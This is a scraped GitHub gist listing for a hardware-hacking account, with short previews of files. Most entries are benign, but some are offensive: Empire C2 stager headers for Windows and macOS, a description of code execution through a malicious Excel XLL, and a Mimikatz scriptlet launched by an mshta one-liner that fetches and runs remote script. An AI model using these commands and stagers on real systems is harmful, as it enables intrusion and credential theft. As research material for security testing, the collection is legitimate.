The list below is compiled to inform, guide, and inspire budding security researchers. Oh and to pick something for bedtime reading too.
WHID: We Hack In Disguise whid-injector
whid-injector
/ imperfect-design.md
Created
March 16, 2021 20:19
— forked from dev-zzo/imperfect-design.md
A curated list of research papers on embedded security, keyed by the device p/n
whid-injector
/ proc_net_tcp_decode
Created
January 8, 2021 22:19
— forked from jkstill/proc_net_tcp_decode
decode entries in /proc/net/tcp
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Decoding the data in /proc/net/tcp: | |
| Linux 5.x /proc/net/tcp | |
| Linux 6.x /proc/PID/net/tcp | |
| Given a socket: | |
| $ ls -l /proc/24784/fd/11 | |
| lrwx------ 1 jkstill dba 64 Dec 4 16:22 /proc/24784/fd/11 -> socket:[15907701] |
whid-injector
/ whid.py
Created
September 27, 2019 06:38
Linux/OSX stager for Empire 2.3. Place in lib/stagers/osx directory. P.S. It is old thingy I accidentally found on my VPS. Not sure still works.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'WHIDLauncher', | |
| 'Author': ['@LucaBongiorni','@xorrior'], |
whid-injector
/ whid.py
Created
September 27, 2019 06:38
Windows stager for Empire 2.3. Place in lib/stagers/windows directory. P.S. It is old thingy I accidentally found on my VPS. Not sure still works.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| from lib.common import helpers | |
| class Stager: | |
| def __init__(self, mainMenu, params=[]): | |
| self.info = { | |
| 'Name': 'WHIDLauncher', | |
| 'Author': ['@LucaBongiorni','@harmj0y','@kisasondi'], |
whid-injector
/ adfasdf.md
Created
October 22, 2018 13:36
asdf
whid-injector
/ sha256sum.txt
Created
January 26, 2018 18:12
— forked from PyYoshi/sha256sum.txt
GPD Pocket--firmware of Windows OS(20170526).rar
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 87a1f231fa93a45db5b3b8fd36780ff2cd5857de77bb4c0d580366e599b1a817 GPD Pocket--firmware of Windows OS(20170526).rar | |
| 800635981f43f4efabf84e1988f4dbca89b2eda0400718647ef8904e595170b6 ./WINPE/BOOTEX.LOG | |
| 21bf8054adfe0614baba6f21a4bad0b7bfe71dbe9169d2422de42a79258beba0 ./WINPE/Boot/BCD | |
| 8358dd2d0dc148113181718daee0b916e6e37ea7d94afd06ee153086da1ce478 ./WINPE/Boot/Fonts/chs_boot.ttf | |
| 9be3453a0ccd14f3ae1fc766727909b22b51f561d9a5cd0338e8ad41b2be5737 ./WINPE/Boot/Fonts/cht_boot.ttf | |
| 89470defffa753a6d3fcff4db243ec211d9970ae67f1f840034fe9199020db1c ./WINPE/Boot/Fonts/jpn_boot.ttf | |
| 6a21388fc2c5fda2cd7d08ffa0ce01dc6c65e08fcb030a3d3aaa39c31b1c398a ./WINPE/Boot/Fonts/kor_boot.ttf | |
| 6846bcd60c75f991dc009f6c0dad10ce2016cb00acc9d208abd596fb2e6bd7d0 ./WINPE/Boot/Fonts/malgun_boot.ttf | |
| 458f90f9e99e25b8777b3e4ba872f822ee074668814d52d454f3597af2fc8680 ./WINPE/Boot/Fonts/malgunn_boot.ttf | |
| ec653bdee02143ef49f28ef932bb31ab9c6d6a431c8d8f244ce44a7f7ad03e66 ./WINPE/Boot/Fonts/meiryo_boot.ttf |
whid-injector
/ Readme.md
Created
January 18, 2018 15:16
— forked from rxwx/Readme.md
An XLL file is basically a DLL with some special features to make it work with Excel.
See - https://msdn.microsoft.com/en-us/library/office/bb687911.aspx
By creating a DLL which exports xlAutoOpen, and then renaming the compiled DLL to .xll, we can execute our code in DllMain when the file is loaded by Excel.
The attached .xll file will open with Excel (by default) when double-clicked. The user will then be presented with a warning. If the warning is clicked through, then our code is executed.
whid-injector
/ mimikatz.sct
Created
January 18, 2018 14:17
Mimikatz inside mshta.exe - "mshta.exe javascript:a=GetObject("script:http://127.0.0.1:8000/mshta.sct").Exec(); log coffee exit"
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| description="Bandit" | |
| progid="Bandit" | |
| version="1.00" | |
| classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}" | |
| > |
whid-injector
/ HuddledTricks.psm1
Created
November 21, 2017 10:48
— forked from Jaykul/HuddledTricks.psm1
Stupid PowerShell Tricks
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #Requires -version 2.0 | |
| ## Stupid PowerShell Tricks | |
| ################################################################################################### | |
| add-type @" | |
| using System; | |
| using System.Runtime.InteropServices; | |
| public class Tricks { | |
| [DllImport("user32.dll")] | |
| private static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow); | |
whid-injector
/ USaBUSe-install.sh
Created
April 30, 2017 08:36
— forked from singe/USaBUSe-install.sh
Setting up a new binary-only USaBUSe install on a new macOS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| brew install avrdude wget | |
| pip install pyserial | |
| git clone --recursive https://github.com/sensepost/USaBUSe | |
| cd USaBUSe | |
| wget --content-disposition "http://bbs.espressif.com/download/file.php?id=1046" | |
| unzip ESP8266_NONOS_SDK_V1.5.1_16_01_08.zip | |
| mkdir esp-vnc/firmware |